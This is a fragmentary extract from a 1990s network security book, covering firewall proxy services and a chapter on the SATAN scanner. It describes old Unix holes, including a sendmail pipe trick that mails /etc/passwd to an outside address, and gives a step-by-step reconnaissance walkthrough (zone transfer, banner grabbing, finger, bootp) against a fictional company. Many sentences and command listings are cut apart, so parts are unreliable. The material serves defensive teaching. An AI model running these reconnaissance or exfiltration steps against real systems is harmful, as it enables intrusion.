authserver hostname [portnumber [cipherkey]]

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

425

How to Build a Firewall

The authserver option specifies the name or address of a system to use for network authentication
...
If the server
supports DES-encryption of traffic, an optional cipherkey can be provided to secure communications with the server
...
] [ options]

The hosts rules specify host and access permissions
...
33
...
* 192
...
214
...
Optional parameters include:
-dest pattern
-dest pattern1 pattern2
...
If no list is specified, all destinations are considered
valid
...
-dest entries
preceded with a “!” character are treated as negation entries
...
edu” to be connected
...
mit
...

-passok

The -passok option specifies that the proxy should permit users to change their passwords if
they are connected by the designated host
...


Installation
To install tn-gw place the executable in a system area, then modify inetd
...
The telnet proxy must be installed on the telnet port (port 23) to
function properly
...
In some installations this may
cause a dilemma
...
Another option is to permit

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

426

Part II: Gaining Access and Securing the Gateway

rlogind to run with netacl protecting it so that only a small number of administrative machines
can even attempt to log in
...


x-gw—X Gateway Service
Synopsis
x-gw [display/hostname]

Description
x-gw provides a user-level X connection service under tn-gw and rlogin-gw access control
...
When the connection request arrives, x-gw pops up a window
on the user’s real display asking for confirmation before permitting the connection
...

To run X through the firewall, exceptions have to be made in router configuration rules to
permit direct connectivity to ports from 6000 to 6100 on internal systems
...

Each time an X client application on a remote system starts, a control connection window
pops up on the user’s screen asking for confirmation before permitting the connection
...
The child daemon cleans
up the buffed data and exits if a connection is closed by either end
...
33
...
194
...
tis
...

Escape character is ‘^]’
...
tis
...
3) ready:
tn-gw-> x
tn-gw-> exit
Disconnecting
...


A window pops up on the user’s screen showing the port number of the proxy to use, and acts
as the control window
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

427

How to Build a Firewall

Options
display/hostname

The display option specifyiesa destination display where the user wants applications to appear
...
0, if the
argument is not specified
...
0 port is also a default number if the user sets the display to a
host name
...
The location of x-gw is compiled into the components of the
firewall Toolkit in tn-gw and rrlogin-gw, based on the netperm-table
...

—Dante Alighieri, Inferno
Some people think that open discussion of network
security problems is an invitation to disaster
...
The release of the
SATAN program in April 1995 created an uproar
with this group
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

430

Part II: Gaining Access and Securing the Gateway

SATAN, a Unix program that quickly checks for the presence of vulnerabilities on remote
systems, offers an easy way for the average user to quickly examine the network security of
computer systems
...
The interesting name, the uniqueness of one of the creators, and the
topic of Internet security certainly added to the publicity of SATAN; however, SATAN did
contribute materially to network security monitoring in other ways
...
First, the user interface consists of HTML pages that are used through a
Web browser such as Mosaic or Netscape
...
Second, although SATAN is available with
several security tests built in, the general structure of SATAN permits a user to easily add
additional probes
...
These three innovations made the release of SATAN a significant advance in
the field of network security programs
...
It takes the
view that the best way a system administrator can ensure the security of a system is by considering how an intruder would try to break into it
...

An analogy might clarify the importance of SATAN
...
If, one night, you forget to lock
one of your windows in your neighborhood, it may not matter
...
However, if a burglar tried to break into your house
on the night that a window was left open, it would certainly simplify his job
...
In the hands of a conscientious apartment
manager or policeman, such a tool would help to ensure the safety of the neighborhood
...

SATAN is that device for the Internet
...
These potential intruders do not have to be particularly bright, because SATAN is
easy to use
...
These
intruders do not even have to know about the existence of the systems, because network ranges
can be used for targets
...
However, because every intruder in the world can quickly identify vulnerable
hosts, it “raises the bar” of required security to new heights
...
However, for hosts directly on
the Internet, relying on the obscurity of open windows is no longer acceptable
...

Before describing the SATAN program in great detail, this chapter investigates the nature of
network attacks
...
Next, the exact
details on the security holes searched for by SATAN are studied, as well as other network
holes
...

The important message that SATAN brings is this: thinking like an intruder can help you to
improve the security of your systems
...
Although no designer consciously puts security holes into
software, tensions frequently exist between a software program’s ease of use, its functionality,
and its security
...
Add configuration errors (netgroup mistakes), user shortcuts (xhost +), and
organizational policy mistakes (NFS servers on the Internet) to these design flaws, and the
result is a catalog of vulnerabilities for a wily intruder to prey upon
...
Although this is a drastic solution, there is always a trade-off between offering functionality and introducing vulnerabilities
...
For example, permitting electronic
mail to cross from the Internet into your internal organizational network means that the
firewall must have a network daemon, such as sendmail, listening on the SMTP port (TCP/25)
and willing to enter into an SMTP protocol exchange with anyone on the Internet
...
Even though an Internet service, such as NCSA’s
httpd web server, may be considered quite secure today, new releases may introduce vulnerabilities
...
Administrators must be vigilant against
assuming the long-term security of any Internet service
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

432

Part II: Gaining Access and Securing the Gateway

The network protocols themselves can be made secure
...
A protocol and service is “secure enough” when it
has only ITL Class 0 vulnerabilities, as explained later in this chapter
...
Network daemons, such as sendmail or fingerd, can be made more
secure by vendors through code review and patching
...
Also, organizational
policies can be very difficult to enforce
...
rhosts files, it can be
difficult to enforce this rule
...

It is rare to find an organization that has complete control over its computer network
...
In a large organization, policies and IT groups can and should try to set
guidelines for systems, such as not permitting unrestricted NFS access, but the distributed
nature of networked systems make this control uncertain
...
For example, 500
computers on the U
...
Department of Defense’s Milnet network were successfully attacked in
early 1995 because of a single unauthorized Internet gateway that accidentally offered a
vulnerability (Leopold, 1995)
...
An IT organization can use SATAN to gain such control
...
This has not been done previously and is introduced in this book as a suggestion for
vendors and organizations when prioritizing security problems
...
The lowest threat falls into ITL Class 0, and the greatest threat
falls into ITL Class 9
...
1 provides descriptions of each ITL Class
...


Table 8
...


1

Local users can gain read access to files on the local system
...


3

Local users can gain write and/or execution access to root-owned files on the
system
...


5

Remote users on the same network can gain write and/or execution access to
non–root-owned files on the system or transmitted over the network
...


7

Remote users across a firewall can gain read access to files on the system or
transmitted over the network
...


9

Remote users across a firewall can gain write and/or execution access to rootowned files on the system
...
It might be useful to classify the severity of the threat in order to allocate resources
proportional to that severity
...
It may not even be necessary to close the Class 1 holes, depending on the
importance of the data on the system
...
System administrators frequently have control over local users to an extent that
these problems are not exploited, at least not maliciously
...

Class 4 through 6 problems are much more serious, because non-electronic control over the
intruders is no longer simple
...
For systems directly connected to the Internet, these problems are
extremely serious
...

Class 7 through 9 problems are very serious problems; with Internet access a requirement for
most organizations, firewalls are the only barrier between a company’s most guarded data and
intruders
...
SATAN does search for vulnerabilities in this range
...
Under these conditions, SATAN should not find many vulnerabilities in this range
...

A multiuser system intended for payroll management would find a Class 1 hole to be much
less tolerable than a single-user workstation intended for CAD designs
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

435

SATAN and the Internet Inferno

A multiuser system that served as an inventory control machine for many users might find
Class 3 holes to be a much greater threat than Class 7 holes because of the great importance of
uninterrupted uptime
...

A system with sophisticated users might be vulnerable to Class 3 holes also, because such users
might want to exploit these holes for making configuration changes outside the official system
administration path; for example, a system used by many programmers to do builds of software
packages might be vulnerable to a Class 3 hole when one user uses the hole to make changes to
disk quota settings, makes a mistake, and causes the system to crash
...


System Classifications
The U
...
DoD (Department of Defense) created a computer security classification scale in
a document called the “Orange Book” (DOD, 1985a)
...
Most Unix systems are C-level, with some claiming C2 compliance or certification
...

An alternative baseline for security classifications could be based on the aforementioned ITL
class ratings: a system could be branded based on its highest ITL class problem
...
The ideally secure system would be an ITL Class –1 system,
probably corresponding to a system that is disconnected from the Internet
...

SATAN attempts to classify systems based on the severity of vulnerabilities found
...
It would be quite useful if SATAN used the ITL classification scale: a numerical index
is a much better tool for comparing systems and allowing an organization to manage a large
number of computers
...


Common Attack Approaches
Before looking at common attacks, it is useful to characterize the attack
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

436

Part II: Gaining Access and Securing the Gateway

When attacking an organization, attacks can be oriented to look for mistakes due to the
distributed control of the systems
...
Such attacks focus on breadth rather than innovation
...
S
...

Attacks against single hosts might take advantage of weaknesses in that host as well as vulnerabilities in “nearby” systems, that is, systems that are trusted by the target system, systems that
are connected to the same physical network, or systems that have the same users
...
In the second case, attackers can try to install packet sniffers that will capture
traffic going to and from the target system
...


Note For more information on spoofing and sniffing, see Chapter 6
...


Phase One: Get a Login Account
The first goal of any attack on a Unix system is to get a login account and a password
...

Once they have the passwd file, they can run Crack on it and probably guess at least one
password
...


Note Crack is a program originally created by Alec Muffett of Sun Microsystems
...
By using some intelligent
rules, such as permutations on the login name, and a user-provided dictionary of
words and names, which can be as large as the user specifies, Crack can be
surprisingly effective at quickly guessing passwords
...
With a megabyte dictionary, Crack may run for a few days, but
it has a high chance of finding even obscure passwords
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

437

SATAN and the Internet Inferno

How does an attacker get a login to a target Unix system? First, the hacker gathers information
about security holes that exist in different Unix products and ways to exploit these holes
...
Finally, the hacker matches the opportunities with the vulnerability information and
attempts to gain a login into the system
...

SATAN specifically addresses remote vulnerabilities
...


Warning Absurd as this may sound, the legal implications of running a program such as
Crack may be quite severe
...
Even though he was
working for Intel as a security consultant, Intel had not authorized him to run Crack
...


Phase Two: Get Root Access
The second phase of an attack is not necessarily a network problem
...
Some network problems, such as unrestricted NFS
access with root permissions for reading and writing, can be used to gain root access
...
A better tool for this second phase might be COPS, another program from the makers of
SATAN (see Appendix B for details on getting COPS)
...
Careful configuration and setup can help to minimize potential vulnerabilities
...
(All currently logged in users are listed in the utmp file
...
The “last”
command will format the wtmp file and provide a complete listing of all logins, including
information on the source of the login and the duration of the login
...
The syslog files are also extremely
useful in monitoring system activity
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

438

Part II: Gaining Access and Securing the Gateway

Programs that permit users to gain superuser access, such as sudo,
...
Some of these programs, such as osh, provide for control over what root actions are
permitted, decreasing the scope of damage that could occur
...
(This is described in detail in the “Passwords” section of this chapter
...
Common attack approaches include modifications to login daemons to capture
passwords (ftpd, telnetd, rlogind, login), addition of packet sniffers that capture the passwords
of network traffic and send them back to the intruder, and masquerade attacks that attempt to
use trust to gain access
...
SATAN does not typically play a role in this third phase
...
Then the burglar either looks for car keys
left above the visor, or hotwires the car (second phase)
...
As SATAN may
have gathered information about other important hosts (NFS servers or NIS servers), this third
phase may use that information to focus attacks on gathering access to those systems
...
A competent
intruder can easily cover his tracks by modifying accounting and auditing records
...
This package comes with source for
programs such as ps, ls, sum, and who; the system administrator is no longer able to determine
the integrity of binaries because the sum command gives tainted information
...
Fortunately, rootkit is quite
difficult to find—the primary distribution method has not been through FTP archives
...
The COPS program can help do this
...


An Overview of Holes
At this point, the general approach of a network attack should be clear
...
The following holes have been patched by most vendors and
announced by CERT or the vendors; however, similar holes are frequently re-opened in new

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

439

SATAN and the Internet Inferno

releases, and many system administrators are slow to apply patches
...

Unlike misconfiguration errors, which are described in detail later in the chapter, these security
holes have arisen due mostly to software programming mistakes in the network daemons
...
An example of adding
a scan to SATAN is included at the end of this chapter
...
, 1993) gives a breakdown of the
source of 50 security flaws
...


sendmail -d Debug Hole
A recent sendmail hole involved the -d command-line option, which permits a user to specify a
debug level
...
By specifying a
very large value to the debug option of sendmail, a user could overwrite the stack frame and
cause unexpected commands to be executed
...
SATAN scans for versions of sendmail that are old enough to include this
security hole
...
com < /etc/passwd as the sender of a
message, and then indicating a bad recipient name, sendmail would accept the message,
attempt to send to the bad recipient, realize that user did not exist, and bounce an error
message back to the sender
...
Sendmail was not smart enough to prevent
senders from being programs
...


sendmail syslog Buffer Problem
sendmail, along with many other programs, uses syslog() calls to send information to the
syslogd daemon
...
The syslog() call would invoke the vsprintf() libc call and overflow the
stack frame for the vsprintf() call
...
A hacker script was made available to gain root access on Sun OS systems by
writing long information into the appropriate fields of an SMTP transfer, causing the remote
sendmail to invoke a root shell
...
The buffer allocated for the string was 512 bytes long, but
the fingerd program did not check to see that the read was greater than 512 bytes before
exiting the subroutine
...
The stack could be rewritten
to permit the intruder to create a new shell and execute commands
...


hosts
...
equiv file, in addition to the hostname, that user on
that remote host could specify the username of any user on the system and gain access
...
equiv that contained the line halifax julie, the
user julie on the remote system halifax could gain access as any user on system george
...
rhosts check
using a goto call
...
(SSL stands for Secure Sockets Layer, a protocol that permits authentication and encryption—the implementations of this protocol involve the use of a library of
routines that permit a nearly drop-in replacement of standard socket calls
...
”) So, even though the encryption used
IDEA, RC4-120, or Triple-DES, in which the key size is over 120 bits, the key was generated
with a random number chosen from a 16- to 32-bit space
...
The
problem with session keys is that they depend on good random numbers, and no computer can
currently easily create a good random number
...

RFC 1750, Randomness Requirements for Security, attempts to address this issue
...
netscape
...
tar
...


TCP Sequence Guessing Problem
Even though a system has turned off support for the IP source routing option, an intruder
can fool that system into believing that it is communicating with a trusted host
...
The intruder now initiates a new connection using the IP address of a trusted
system
...
equiv file that indicates host B to be trusted
...
To carry on the masquerade, the intruder needs to ACKnowledge each TCP
packet from the target
...
So, when the target
system sent the response packet to the real trusted system, which discarded it because no active
listener was available, the intruder quickly sent back the appropriate acknowledge packet to
complete the TCP connection
...
equiv trust by hostname mechanism
...
Although this does not prevent an intruder from guessing
it, it does make guessing much more difficult
...
If they do have physical access, hijacking of existing connections can be done
...


ftpd Server Bounce Problem
The proxy server feature of ftpd was created to permit third-party transfers of files
...
This feature, actually specified
in the RFC requirements, when combined with the quote command, the PORT statement,
and the PASV statement, permits a user to avoid IP access controls and traceability
...
So, the user could request the remote ftpd to send a file containing
valid network protocol commands to a server program listening on any TCP port on any host,
causing that server to believe that the source of the network protocol connection is the remote
ftpd
...
S
...
The MIT ftpd screens out IP addresses from outside the U
...
, in an attempt to
comply with U
...
export restrictions of cryptographic material
...
S
...
The French user ftps to her own machine
and puts it into a PASV mode, then does a STOR of a new file, say foobar
...
S
...
These
statements include a PORT command with the IP address and port number of the French ftpd
that is doing a passive listen and STOR, as well as a subsequent RETR to retrieve the desired
file
...
S
...
Finally, the French user specifies a quote RETR
command to the U
...
ftpd for the text file containing the command statements
...
S
...
S
...
The MIT file is therefore sent to the
French ftpd and stored as foobar on that site, whereas the MIT ftpd logs indicate that the file
was sent to the U
...
ftpd
...
Completely
untraceable e-mail or Usenet news postings could be done this way, which would be a benign
use of this hole
...

The only way to avoid this is to turn off proxy functionality completely
...
org/random/ftp-attack for full details on this hole and the suggested fix to ftpd
...
mountd and causes them to
appear to originate from the IP address of the system running portmap
...
SATAN does a scan for this portmap
vulnerability
...
If a
user created a link from a username to an outside file, sendmail’s delivery agent, such as /bin/
rmail, would write the incoming mail file to the linked file
...
The user could then mail a new username to root and have
it appended to /etc/passwd
...


NFS uid 16-Bit Problem
An NFS server depends on client-side authentication, verifying only the source IP address of
the request, so claiming to fix an NFS server vulnerability is a tenuous claim at best
...

However, a user that claimed a client uid of 0 + 2^16 = 65536 would be acceptable to NFS
and not get remapped to a new uid
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

443

SATAN and the Internet Inferno

arp -f Problem
The arp program uses an -f flag to permit a user to specify a file containing an arp cache to be
read
...
This means that a regular user can read any root-owned file on the system by specifying
that file to arp using the -f option
...
Because any user can invoke
sendmail (this is required to be able to send mail), and because sendmail does a set-uid to root,
this means that sendmail can read any root-owned file
...
This meant that a regular user could read any root-owned file on the system by
specifying that file to sendmail using the -C option
...
Then invoking rwall to send a message to all users would result in that message being
written to that file
...
rhosts file could be written by using the
appropriate message
...


Note Advice to designers: Notice that several of the security holes are based on the same
common mistakes
...
Programs that have
higher privileges and can manipulate files, by either reading and printing them out
or writing them and allowing a user to specify the pathname (write the log to /etc/
passwd) or to create a link from the standard pathname, are frequently seen
...

Finally, security that depends solely on hostname or IP authentication can be easily
circumvented
...
Granted, the vulnerabilities that SATAN scans for are quite widespread and severe in nature; however, SATAN
provides a wonderful framework for easily adding scans for new security holes
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

444

Part II: Gaining Access and Securing the Gateway

The Internet is a wonderful place to find out about new security holes
...
The
section at the end of the chapter contains a detailed list of network sites and mailing lists
...
Although new groups are always being
created, a core set of useful groups can always be depended upon: comp
...
unix,
comp
...
misc, and alt
...
A few
others, such as comp
...
firewalls, comp
...
announce, alt
...
crypt, are occasionally useful, although these groups contain quite a bit of theory or
noise
...

Mailing lists are quite useful, although they can generate quite a bit of uninteresting traffic
...
The 8lgm list is very useful in learning about new holes and getting
exploitation information, because they frequently post detailed information on vulnerability
...

Other non-security-related mailing lists that directly address Internet services also frequently
deal with security
...

The advent of the World Wide Web has resulted in the creation of many Web pages dedicated
to security
...
S
...
A list of Web sites is included in Appendix B
...
Perhaps the other vendors have yet to fix this problem, or
perhaps the other OS platforms are not yet patched?
FTP security archives, such as Wietse Venema’s ftp
...
tue
...
cert
...
tamu
...
A list of
various FTP archives is included in Appendix B
...
sunsite
...

Finally, you should look for updates to SATAN itself, in case scans for new vulnerabilities are
added into the base distribution
...
The first phase of a network attack consists of gaining information about security holes
...
The next part of this phase is gaining information about the
target systems
...

The creators of SATAN gained notoriety a few years before SATAN’s release when they
published a paper entitled “Improving the Security of Your Site by Breaking Into It” (Farmer
& Venema, 1993)
...
Work on the paper led the
authors to create SATAN, so it is appropriate to try to follow the same approach in learning
about SATAN
...

Instead of using a real organization, the example uses a hacker that attempts to gain access to
an imaginary company called NotReal Corporation
...
The
assumption is that the hacker has access to a system on the Internet and will mount the attack
from that location, with no additional access over any other network
...


Gathering Information on Systems
What the hacker would like to do is create a map of all the systems in the company, along with
version numbers of the OS, lists of the usernames, and a list of the network services that are
being run on those systems
...
com, the hacker can get back either a list of hosts on the notreal
...
com network
...
Sometimes, the whois output contains a
prepared message that includes a nicely formatted list of the domain servers along with system
admin names
...
)

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

446

Part II: Gaining Access and Securing the Gateway

For example, here is what the hacker might see as a result of doing a whois notreal:
# whois
Notreal
Notreal
Notreal
Notreal

...
COM
- Bldg 11 (NET-NSOFT-1) NSOFT-1
123
...
67
...
COM
Corporation (NOB3-DOM)
NOB
...

> set type=any
> notreal
...
hackersystem
...
2
...
4
Non-authoritative answer:
notreal
...
com
nameserver =
notreal
...
com
preference =

dns1
...
COM
dns
...
COM
10, mail exchanger = mail
...
com
20, mail exchanger = m2
...
com

Authoritative answers can be found from:
notreal
...
notreal
...
com
nameserver = dns
...
COM
DNS1
...
COM internet address = 12
...
56
...
SOMEBODYELSE
...
45
...
89
mail
...
com internet address = 123
...
67
...
notreal
...
456
...
9
>

The hacker already has a few hosts by using whois and nslookup
...
com map from the DNS server named, running on the
dns1
...
com system
...
Any system can usually request these
...
9
...
) The hacker uses the program named-xfer to do exactly
that:
% named-xfer -d notreal
...
notreal 12
...
56
...
notreal
$ORIGIN notreal
...

notreal
IN
SOA
dns1
...
com
...
dns1
...
com
...
notreal
...

$ORIGIN dns1
...
com
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

447

SATAN and the Internet Inferno

The hacker is now getting a much better picture of the hosts in the notreal
...
He or
she would like to find out how many of these hosts are directly connected to the Internet and
how many are behind a firewall
...
Even better, the
fping command can do this most efficiently and is shipped with SATAN
...
notreal file to list out all the hosts in the notreal
...
This aids the hacker in generating a list of systems directly on the
Internet:
% cat notreal
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...

% fping < notreal
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...


The hacker now starts looking at the systems that are connected to the Internet
...


telnetd Information
The quickest way to identify the OS type is by attempting to telnet to the systems
...
notreal
...

Connected to sys4
...
com
...

HP-UX sys4 A
...
04 U 9000/847 (ttyp4)
login:

This system is an HP-UX 9
...

The banner lines from the telnetd prompt of other systems in notreal
...
notreal
...

dns1
...
com
UNIX(r) System V Release 4
...
No assumptions can be made of the OS type
...
x system, but this banner is no guarantee that the remote
system is indeed a Solaris 2
...

m3
...
com
IRIX System V
...


Note While the hacker is telneting to the SGI system, he will try to log in with the account
names that, by default, have no passwords on SGI systems
...
(Actually, many Unix
systems still use the guest login with a guest password
...
notreal
...
It probably is a Sun OS 4
...

sys3
...
com
AIX Version 4
(c)Copyrights by IBM and by others 1982, 1994
...
0
...
A true intruder
would first try to build up a database of all possible telnetd banners from as many
systems as possible, to characterize all the possible OS sources of a particular
banner
...
SATAN uses
the banner information to quickly identify systems
...
If users ever telnet to your system across the Internet, have them change their
password as soon as they return to the internal company system
...
This is also the case
for rlogin, rexec, and FTP
...
Some variables can be quite dangerous to pass in
...
See the recent
CERT advisory on telnetd for more information (CERT CA:95-14)
...
It also
allows an unauthorized user to sometimes issue commands, such as system, help, and others
...
If it is available, the hacker then tries to exploit possible problems with ftpd
...

Anonymous FTP is useful in helping the intruder build up a database of information on the
target system
...

% ftp m2
...
com
Connected to m2
...
com
...
60) ready
...

Password:
230 Guest login ok, access restrictions apply
...

Using binary mode to transfer files
...
Many Internet services, such as ftpd or sendmail, offer help in response to a help
command
...
The following shows a list of
commands offered by the preceding ftpd:
!
$
account
append
ascii
bell
binary
bye
case
cd
cdup
chmod
close
cr
debug

delete
dir
disconnect
form
get
glob
hash
help
idle
image
lcd
ls
macdef
mdelete
mdir

p1vPHCPannex1

mget
mkdir
mls
mode
modtime
mput
newer
nlist
nmap
ntrans
open
prompt
proxy
put
pwd

quit
quote
recv
reget
rename
reset
restart
rhelp
rmdir
rstatus
runique
send
sendport
site
size

status
struct
sunique
system
tenex
trace
type
umask
user
verbose
?

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

450

Part II: Gaining Access and Securing the Gateway

The m2 is a Digital Unix system, running OSF/1
...
The help command provides the hacker with a number of
useful tidbits: the site command is available, as are proxy, quote, system, sendport, and other
useful commands
...

% ftp dns1
...
com
Connected to dns1
...
com
...
0) ready
...

Login failed
...

ftp>

The hacker gets no information from the ftp prompt and no information from the system
prompt
...
4 system, but such a prompt is no
guarantee that the system is a Solaris 2
...
For the sake of brevity, the subsequent ftp
transactions have been edited to remove redundant information such as username and
password prompts
...
notreal
...
notreal
...

220 m3 FTP server ready
...
This
came from an SGI IRIX system, but there is no way to tell that for sure from this prompt
...
notreal
...
notreal
...

220 m4 FTP server (SunOS 4
...


This is a Sun OS 4
...
The hacker does not need to use the system command
...
)
% ftp mail
...
com
220 mail FTP server (Version wu-2
...


This one is interesting
...
This
popular ftpd offers extensive functionality
...
Unfortunately, wu-ftpd gives no information on the system type
...
notreal
...
1 Sat Aug 27 17:18:21 CDT 1994) ready
...
1 is an IBM AIX version number; however, the BSD-44 does not guarantee that
the system is an IBM AIX source, because others could give this same answer
...
notreal
...
notreal
...

220 sys4 FTP server (Version 1
...
193
...

ftp> system
215 UNIX Type: L8

This system gives no information at all; it came from an HP-UX 9
...
The only
thing that might give it away is the version number, but this is no certainty, because other
versions of Unix might put a similar RCS type number in the Version banner
...

sendmail is a great source of security holes, because it typically runs set-uid to root, consists of
tens of thousands of lines of C code, has a large and complex configuration file that is customized by every user, and is run on every host that acts as a transport agent for e-mail on the
Internet
...
The Macs or PCs do
not typically act as mail transport agents on the Internet
...
He
could also use EXPN (expand), HELP, and VRFY to identify information such as the identity
of the postmaster (a requirement for all mail hosts), root, guest, webmaster, ftp, uucp, lp, and
www
...

If sendmail is configured to permit EXPN, the sendmail aliases file is read and the expansion
corresponding to the entry is returned
...
A utility program, expand_alias, is available
that can automate expansion searches
...
com:
% telnet dns1
...
com 25
220 dns1
...
com
...
0/SMI-SVR4 ready at Sat, 11 Nov 95 19:47:37 PST

Note sendmail typically reports back the version of the binary as the first field after the
name sendmail in the initial banner, followed by a / and the version of the configuration file
...
cf file and may differ on some
machines
...
0 version, and the config file has an SMI-SVR4
version
...
, and 5
...
0 or
Solaris 2
...

% telnet m2
...
com 25
Connected to m2
...
com
...
65v3
...
1
...
6) Sat, 11 Nov 1995 20:04:27

The binary says 5
...
2, which indicates that it is version 5
...
The 3
...
Recall from the ftpd
banner that this system is a DEC OSF/1 box
...
It appears to be an RCS version number
...

% telnet m3
...
com 25
220 m3
...
com Sendmail 931110
...
SGI ready at Sat, 11 Nov 95
19:54:12 -0800

This is clearly the SGI system
...
SGI) and
sendmail config file (930416
...
This is useful if a hacker finds that a sendmail security hole
occurred after the given date in the header string
...
A hacker can find details on that by studying the
CHANGES file for the latest sendmail available from UCB
...
notreal
...
Sendmail 4
...
1 ready at Sat, 11 Nov 95 19:53:48 PST

SMI tells you that this is a Sun OS, and 4
...
There is no
information on the version of sendmail, although you can make assumptions based on the OS
version
...
notreal
...
notreal
...
1/UCB 5
...
03 ready at Sat, 11 Nov 1995
20:22:55 -0800

This banner is quite clear about the OS version (IBM AIX 4
...
64)
...

% telnet mail
...
com 25
220 mail
...
com ESMTP Sendmail 8
...
7; Sat, 11 Nov 1995 20:05:52 -0800 (PST)

This system is running the latest version of sendmail from the UCB distribution
...
notreal
...
notreal
...
37
...
8/15
...
Although the ftpd on HP-UX
did not announce the OS type, the sendmail daemon does
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

453

SATAN and the Internet Inferno

Note The amount of information gained by interrogating each network daemon on the
target systems can easily overwhelm an intruder
...
In the absence of such a tool,
perhaps a spreadsheet or custom database could help maintain the information
...
cs
...
edu (currently 8
...
2) nearly always has patches for all known holes
...
Using smrsh and a small list of permissible programs
can also improve your sendmail security, as can disabling VRFY and EXPN, although this does
remove some of the usefulness of the e-mail infrastructure
...
conf file,
which contains a list of services offered by inetd
...
The hacker can write similar socket programs to do this,
but it is, once again, much easier to use SATAN
...
” The /etc/services file provides a list that can be used to make assumptions on the service listening to the port that accepted a connect during the scan
...
For example:
% more /etc/services
# This file associates official service names and aliases with
# the port number and protocol the services use
...

% telnet dns1 echo
Trying
...
notreal
...

Escape character is ‘^]’
...

% telnet sys3 echo
Trying
...

Connected to dns1
...
com
...

Sat Nov 11 22:22:34 1995
Connection closed by foreign host
...

For manual TCP scans, a hacker can use telnet or the SATAN TCP scanner
...
Other port scanners are
available at FTP archives such as COAST
...
Wietse Venema’s
tcp_wrappers is one of the most popular such programs, although several vendors
include similar functionality into inetd, via inetd
...
Xinetd also offers a
good deal of flexibility in controlling services and minimizing risks
...
The hacker
has also gained information on which services are offered on the remote system
...
The hacker can use SATAN to scan
hundreds of hosts for this information in a few seconds
...
Although manual scans, as demonstrated in this section, are useful for
understanding and expanding SATAN, they are quite slow and inefficient
...
The
most popular rpc services are NIS and NFS, both of which offer much to the intruder
...
A hacker looking at the notreal
...
notreal
...

The others are useful too, so the hacker records all this information into an ever-expanding
database
...
All three of these services have been
associated with security holes
...
The newer
version of portmap is called rpcbind; it still features the same issues
...
A system admin can configure this portmap to respond only to requests from authorized network addresses
...
This
program also includes several security improvements such as the elimination of
request forwarding
...
SATAN focuses on the first phase of a
network attack, gaining remote access, and does not try to interrogate the bootpd server;
however, the bootpd server offers an intruder an excellent way to carry out phase three of an
attack
...
SATAN will list the systems running bootpd, and the vigilant intruder
will try to attack these systems once he or she has gained access to any system on the same
LAN segment
...
The ping
causes the compromised system to generate an ARP request packet that the remote server

p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

456

Part II: Gaining Access and Securing the Gateway

responds to with a packet containing its LAN address
...
This requires the hacker to be on the same LAN segment, or else the
LAN address is just that of the nearest router
...
This discussion of bootpd is
related the third phase of an attack: extended access by using additional vulnerabilities, in this
case vulnerabilities only available to systems on the same LAN
...
Therefore, a more realistic attack might come
from a brute force sequencing through all the possible LAN addresses
...
The last three parts
vary by system, offering a total of 255×255×255 = 16 million combinations
...
Some intelligent sequencing may even be
possible
...

Assuming that the hacker is able to get the LAN address, the hacker can now get information
on the boot file that the bootpd (dhcp) server offers to boot clients
...
) Here is an example of being on the same LAN and using ping to grab
the LAN address:
% ping sys4
...
com
PING sys4
...
com: 64 byte packets
64 bytes from 12
...
45
...
time=2
...
notreal
...
3
...
67) at 8:0:9:01:23:45 ether
% bootpquery 080009012345
Received BOOTREPLY from m4
...
com (12
...
45
...
3
...
67
/usr/lib/uxbootlf
...
255
...
0
Gateway:
12
...
45
...
3
...
56
Host Name:
sys4
%

The bootpquery program is a simple HP-UX program that generates a bootp request and
formats the reply
...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

457

SATAN and the Internet Inferno

The information returned by bootpd is quite useful
...
The bootp packets also indicate a boot server system that supplies boot files and boot
configuration information to client systems that boot over the network
...

If the remote systems are using the rpc bootparam method instead of the bootpd method, the
hacker can get the information via the portmap program on the systems that showed
bootparam on the rpcinfo -p list
...
A program called
bootparam that gets such information is included as part of SATAN
...
The firewalls should be configured to screen out packets on the bootp (67/
UDP, 68/UDP, 1067/UDP, 1068/UDP) and portmap ports (111/UDP, 111/TCP)
...
Although it provides useful information for monitoring remote hosts, it provides even
more useful information for hackers who are trying to build up databases of information about
the target systems
...
A third program, rwho, also provides similar information
...

Then the hacker tries using login names at each system, such as root, bin, guest, ftp, tftp,
daemon, sync, and usernames that the hacker has already discovered
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...
notreal
...

No Plan
...
notreal
...
notreal
...

No Plan
...
notreal
...
notreal
...
com
No Plan
...
This information can be useful as vulnerabilities are discovered
...
This would permit the hacker to launch
...


Tip

Avoid enabling fingerd in inetd
...


The rpc equivalent of fingerd is rusersd
...
The output is very similar to who or
rwho
...
SATAN uses
rusers to gather information about remote systems:
% rusers
bkelley
perry
chris
stan
mabel
www

-l mail
...
com
mail:ttys0 Oct 04 12:23
mail:ttys2 Oct 25 14:53
mail:ttys3 Oct 06 08:16
mail:ttys7 Sep 22 10:03
